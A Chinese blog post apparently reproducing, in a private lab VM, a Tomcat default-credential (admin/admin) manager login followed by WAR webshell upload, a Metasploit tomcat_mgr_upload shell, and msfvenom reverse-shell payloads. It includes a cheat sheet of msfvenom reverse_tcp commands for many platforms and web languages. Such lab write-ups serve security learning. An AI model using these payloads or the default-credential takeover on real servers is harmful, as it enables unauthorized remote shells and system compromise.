其他人可以访问自己的本机上的tomcat需要安装jdk吗_TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>...

df615e52e34277dea074b42a978e7e2e.png

操作流程(环境搭建-实践操作)

在linux虚拟机上安装jdk

新创建linux虚拟机

通过mobaxterm连接虚拟机

da843cdad3aa66f20fd025c5491e3314.png

导入tomcat安装包与jdk安装包

apache-tomcat-7.0.92.tar

jdk-8u201-linux-x64.tar.gz

1307a60d99f6f0f4fa7c93c54de0d2a5.png

查询环境中是否存在java

yum list installed |grep java

2c0fe1c261331090bbde1278a358e3dd.png

创建jdk的路径 /usr/java/

mkdir /usr/java/

0eb94d05a60227be202f2117a8f6d752.png

d42cf30916421125a419c967625ab851.png

将jdk包解压

tar -zxvf jdk-8u201-linux-x64.tar.gz

c9ea29d6bb58361c6340b29b91d99620.png

37c0ecebf4a4e3e0ecb0bcbdbc5420ab.png

将jdk 1.8.0_201移动到创建的?usr/java/下

mv jdk1.8.0_201/ /usr/java

19b3bd9733838d8f6efd4d1da300e59d.png

建立短链接

ln -s /usr/java/jdk1.8.0_201/ /usr/jdk

a81d54818e7b4221eab34878bf1d0e64.png

编辑配置文件,配置环境变量

vim /etc/profile

添加

export JAVA_HOME=/usr/java/jdk1.8.0_201

export JRE_HOME=${JAVA_HOME}/jre

export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib

export PATH=${JAVA_HOME}/bin:$PATH

6ac4602c0df3bcafa5edc901e902e7d8.png

重新加载配置文件/etc/profile

source /etc/profile

也可以使用sudo shutdown -r now重启,但是客户环境的服务器一般是不允许重启的

4dec64e9d640ab9fa41f05d9c6a5f477.png

查看java版本

d70f6504607133418ff2342d8c14ac2d.png

运行命令 javac

ef846442b129e057ca80fa6f69633a41.png

在linux虚拟机上安装tomcat

创建一个tomcat目录

mkdir /usr/tomcat

424fc863ff09619e5abe416258a9e1e7.png

解压tomcat安装包

eaa7ad771e70e9f2df402b5e4c3ed535.png

f4b6175d162aad5b7ed0903e32ec292f.png

解压成功

将解压内容移动至 /usr/tomcat

mv apache-tomcat-7.0.92/ /usr/tomcat

9ac33f233d969c81f7361c1226f57161.png

生成链接以便版本升级

ln -s apache-tomcat-7.0.92 server

6f96e1ca39d5c56e2d55b12cb704d82d.png

启动tomcat

在usr/tomcat/server/bin 执行 ./startup.sh

caf2185e6b8d28e8e1ae8a2e56b08c57.png

579c1ddf0259d34f95f7cf17000c75c2.png

关闭防火墙(考虑到安全因素,不可取)

cc669cdf77998f4cf8309d5f7d9f1d28.png

或者编辑防火墙配置文件

vim /etc/sysconfig/iptables

添加需要的端口

23c71735fe3c38446e17eb84e7516da5.png

添加的端口需要在

-A INPUT -j REJECT --reject-with icmp-host-prohibited

之上才会生效

重启防火墙服务

a2e3a1b5a92f4b1293b3cdafdc6ededd.png

查看防火墙端口状态

efa87fb8febe59132e95fa50f731fce4.png

访问页面

1e7978e378fd55ce37f055799957150f.png

演练开始:

https://www.cnblogs.com/bmjoker/p/9892653.html

环境搭建好了

http://192.168.0.106:8080

c7bca5b87da8a0a6d834dd6580212773.png

一、上传war包(马儿连接)

1、尝试弱口令默认密码登录 admin/admin

2368156522c69e204b310e54b2b9bc23.png

2、成功登录manager管理后台

0ca77e6038ec65b887c79fd474b77fb0.png

3、上传war包

上传成功解析成功

bb01427db081bbcd82745ebd75efef8c.png

4、访问war网站内容(内容解析)

http://192.168.0.106:8080/war/

7c26bc4dcc38fe3c127c42cff230773d.png

5、可以执行命令(菜刀连接)

e963432ee7362d45bfa389fc4483f071.png

获取到系统的权限

a3d2c595170462e5b9e34e896cd5eb54.png

二、MSF反弹getshell

exploit/multi/http/tomcat_mgr_upload

85b24630469b77a5897e0dfe0469678b.png

执行ls

4675ff5b88e3403a7828dbdad7992a42.png

还能查看 etc/passwd

36e0fa63a21909a8f37bd19ef4b746ee.png

三、msfvenom来作一个后门反弹webshell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.144 LPORT=1111 -f elf > shell.elf

9f871fddee16c914f28dd1c6229c32a8.png

其他类型的制作的msf反弹webshell

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

执行

e0e949309fe56e935b7776c184645cff.png

反弹回来了

14f4fe69ab624267dce7f3bbe0107785.png

总结:

1、就是靶站搭建的时候会刚刚下载的tomcat的默认的没有manger和其他的admin的管理界面的,需要自己器调整conf/tomcat-user.xml才能进行后续的实验。

0365e0d148858de36c05fe9ed49bd26a.png

2、就是需要手动的安装JDK8以上。

3、开始在靶机上面开启服务一直不能msf连接上,需要重启,调节Linux的net work设置,获取同一网段,才好后面的反弹shell的操作。

4、注意msf的webshell制作过程,那个lhost和lport的IP上远程监听的IP。

https://www.jianshu.com/u/bf0e38a8d400(简书主页)

https://zhuanlan.zhihu.com/c_178411142(知乎主页)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值